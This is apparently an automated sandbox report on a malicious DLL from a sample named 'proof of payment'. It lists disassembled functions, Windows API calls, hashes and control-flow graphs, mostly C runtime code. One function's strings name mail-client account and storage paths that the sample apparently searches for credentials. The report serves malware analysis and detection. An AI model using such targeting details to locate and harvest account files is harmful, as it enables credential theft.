                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                                        • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                                      • _free.LIBCMT ref: 10007CFB
                                        • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                        • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                      • _free.LIBCMT ref: 10007D1D
                                      • _free.LIBCMT ref: 10007D32
                                      • _free.LIBCMT ref: 10007D3D
                                      • _free.LIBCMT ref: 10007D5F
                                      • _free.LIBCMT ref: 10007D72
                                      • _free.LIBCMT ref: 10007D80
                                      • _free.LIBCMT ref: 10007D8B
                                      • _free.LIBCMT ref: 10007DC3
                                      • _free.LIBCMT ref: 10007DCA
                                      • _free.LIBCMT ref: 10007DE7
                                      • _free.LIBCMT ref: 10007DFF
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                      • String ID:
                                      • API String ID: 161543041-0
                                      • Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                      • Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
                                      • Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                      • Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • _free.LIBCMT ref: 100059EA
                                        • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                        • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                      • _free.LIBCMT ref: 100059F6
                                      • _free.LIBCMT ref: 10005A01
                                      • _free.LIBCMT ref: 10005A0C
                                      • _free.LIBCMT ref: 10005A17
                                      • _free.LIBCMT ref: 10005A22
                                      • _free.LIBCMT ref: 10005A2D
                                      • _free.LIBCMT ref: 10005A38
                                      • _free.LIBCMT ref: 10005A43
                                      • _free.LIBCMT ref: 10005A51
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                      • Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
                                      • Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                      • Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                                      • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D72
                                      • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D7D
                                      • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D8A
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                      • String ID:
                                      • API String ID: 1454806937-0
                                      • Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                      • Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
                                      • Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                      • Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph (legend: Executed / Not Executed)
                                      control_flow_graph 377 10009492-100094ef GetConsoleCP 378 10009632-10009644 call 10002ada 377->378 379 100094f5-10009511 377->379 381 10009513-1000952a 379->381 382 1000952c-1000953d call 10007c19 379->382 384 10009566-10009575 call 100079e6 381->384 388 10009563-10009565 382->388 389 1000953f-10009542 382->389 384->378 393 1000957b-1000959b WideCharToMultiByte 384->393 388->384 391 10009548-1000955a call 100079e6 389->391 392 10009609-10009628 389->392 391->378 399 10009560-10009561 391->399 392->378 393->378 395 100095a1-100095b7 WriteFile 393->395 397 100095b9-100095ca 395->397 398 1000962a-10009630 GetLastError 395->398 397->378 400 100095cc-100095d0 397->400 398->378 399->393 401 100095d2-100095f0 WriteFile 400->401 402 100095fe-10009601 400->402 401->398 404 100095f2-100095f6 401->404 402->379 403 10009607 402->403 403->378 404->378 405 100095f8-100095fb 404->405 405->402
                                      APIs
                                      • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,10009C07,?,00000000,?,00000000,00000000), ref: 100094D4
                                      • __fassign.LIBCMT ref: 1000954F
                                      • __fassign.LIBCMT ref: 1000956A
                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 10009590
                                      • WriteFile.KERNEL32(?,?,00000000,10009C07,00000000,?,?,?,?,?,?,?,?,?,10009C07,?), ref: 100095AF
                                      • WriteFile.KERNEL32(?,?,00000001,10009C07,00000000,?,?,?,?,?,?,?,?,?,10009C07,?), ref: 100095E8
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                      • String ID:
                                      • API String ID: 1324828854-0
                                      • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                      • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                                      • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                      • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph (legend: Executed / Not Executed)
                                      control_flow_graph 406 10003370-100033b5 call 10003330 call 100037a7 411 10003416-10003419 406->411 412 100033b7-100033c9 406->412 413 10003439-10003442 411->413 414 1000341b-10003428 call 10003790 411->414 412->413 415 100033cb 412->415 418 1000342d-10003436 call 10003330 414->418 417 100033d0-100033e7 415->417 419 100033e9-100033f7 call 10003740 417->419 420 100033fd 417->420 418->413 427 100033f9 419->427 428 1000340d-10003414 419->428 421 10003400-10003405 420->421 421->417 425 10003407-10003409 421->425 425->413 429 1000340b 425->429 430 10003443-1000344c 427->430 431 100033fb 427->431 428->418 429->418 432 10003486-10003496 call 10003774 430->432 433 1000344e-10003455 430->433 431->421 439 10003498-100034a7 call 10003790 432->439 440 100034aa-100034c6 call 10003330 call 10003758 432->440 433->432 434 10003457-10003466 call 1000bbe0 433->434 442 10003483 434->442 443 10003468-10003480 434->443 439->440 442->432 443->442
                                      APIs
                                      • _ValidateLocalCookies.LIBCMT ref: 1000339B
                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                                      • _ValidateLocalCookies.LIBCMT ref: 10003431
                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                                      • _ValidateLocalCookies.LIBCMT ref: 100034B1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                      • String ID: csm
                                      • API String ID: 1170836740-1018135373
                                      • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                      • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                                      • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                      • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                                      • _free.LIBCMT ref: 100092AB
                                        • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                        • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                      • _free.LIBCMT ref: 100092B6
                                      • _free.LIBCMT ref: 100092C1
                                      • _free.LIBCMT ref: 10009315
                                      • _free.LIBCMT ref: 10009320
                                      • _free.LIBCMT ref: 1000932B
                                      • _free.LIBCMT ref: 10009336
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                      • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                                      • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                      • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph (legend: Executed / Not Executed)
                                      control_flow_graph 488 10008821-1000883a 489 10008850-10008855 488->489 490 1000883c-1000884c call 10009341 488->490 492 10008862-10008886 MultiByteToWideChar 489->492 493 10008857-1000885f 489->493 490->489 497 1000884e 490->497 495 10008a19-10008a2c call 10002ada 492->495 496 1000888c-10008898 492->496 493->492 498 1000889a-100088ab 496->498 499 100088ec 496->499 497->489 502 100088ca-100088db call 100056d0 498->502 503 100088ad-100088bc call 1000bf20 498->503 501 100088ee-100088f0 499->501 505 100088f6-10008909 MultiByteToWideChar 501->505 506 10008a0e 501->506 502->506 516 100088e1 502->516 503->506 515 100088c2-100088c8 503->515 505->506 509 1000890f-1000892a call 10005f19 505->509 510 10008a10-10008a17 call 10008801 506->510 509->506 520 10008930-10008937 509->520 510->495 517 100088e7-100088ea 515->517 516->517 517->501 521 10008971-1000897d 520->521 522 10008939-1000893e 520->522 524 100089c9 521->524 525 1000897f-10008990 521->525 522->510 523 10008944-10008946 522->523 523->506 528 1000894c-10008966 call 10005f19 523->528 529 100089cb-100089cd 524->529 526 10008992-100089a1 call 1000bf20 525->526 527 100089ab-100089bc call 100056d0 525->527 533 10008a07-10008a0d call 10008801 526->533 540 100089a3-100089a9 526->540 527->533 542 100089be 527->542 528->510 543 1000896c 528->543 529->533 534 100089cf-100089e8 call 10005f19 529->534 533->506 534->533 546 100089ea-100089f1 534->546 545 100089c4-100089c7 540->545 542->545 543->506 545->529 547 100089f3-100089f4 546->547 548 10008a2d-10008a33 546->548 549 100089f5-10008a05 WideCharToMultiByte 547->549 548->549 549->533 550 10008a35-10008a3c call 10008801 549->550 550->510
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                                      • __freea.LIBCMT ref: 10008A08
                                        • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                      • __freea.LIBCMT ref: 10008A11
                                      • __freea.LIBCMT ref: 10008A36
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                      • String ID:
                                      • API String ID: 1414292761-0
                                      • Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                      • Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
                                      • Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                      • Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • _strlen.LIBCMT ref: 10001607
                                      • _strcat.LIBCMT ref: 1000161D
                                      • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                                      • lstrcatW.KERNEL32(?,?), ref: 1000165A
                                      • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                                      • lstrcatW.KERNEL32(00001008,?), ref: 10001686
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: lstrcatlstrlen$_strcat_strlen
                                      • String ID:
                                      • API String ID: 1922816806-0
                                      • Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                      • Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
                                      • Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                      • Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • lstrcatW.KERNEL32(?,?), ref: 10001038
                                      • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                                      • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                                      • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
                                      • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: lstrlen$AttributesFilelstrcat
                                      • String ID:
                                      • API String ID: 3594823470-0
                                      • Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                      • Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
                                      • Opcode Fuzzy Hash: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                      • Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
                                      • SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ErrorLastValue___vcrt_
                                      • String ID:
                                      • API String ID: 3852720340-0
                                      • Opcode ID: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                      • Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
                                      • Opcode Fuzzy Hash: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                      • Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                      • _free.LIBCMT ref: 10005B2D
                                      • _free.LIBCMT ref: 10005B55
                                      • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
                                      • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                      • _abort.LIBCMT ref: 10005B74
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ErrorLast$_free$_abort
                                      • String ID:
                                      • API String ID: 3160817290-0
                                      • Opcode ID: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                      • Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
                                      • Opcode Fuzzy Hash: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                      • Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                        • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                        • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                        • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                        • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                      • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                                        • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                                        • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                      • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                      • API String ID: 4036392271-1520055953
                                      • Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                      • Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
                                      • Opcode Fuzzy Hash: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                      • Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10004B6C
                                      • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: AddressFreeHandleLibraryModuleProc
                                      • String ID: CorExitProcess$mscoree.dll
                                      • API String ID: 4061214504-1276376045
                                      • Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                      • Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
                                      • Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                      • Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                                        • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                                      • _free.LIBCMT ref: 100071B8
                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                      • String ID:
                                      • API String ID: 336800556-0
                                      • Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                      • Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
                                      • Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                      • Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                                      • _free.LIBCMT ref: 10005BB4
                                      • _free.LIBCMT ref: 10005BDB
                                      • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                                      • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.3917753758.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000007.00000002.3917733262.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                      • Associated: 00000007.00000002.3917753758.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_10000000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ErrorLast$_free
                                      • String ID:
                                      • API String ID: 3170660625-0
                                      • Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                      • Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
                                      • Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                      • Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
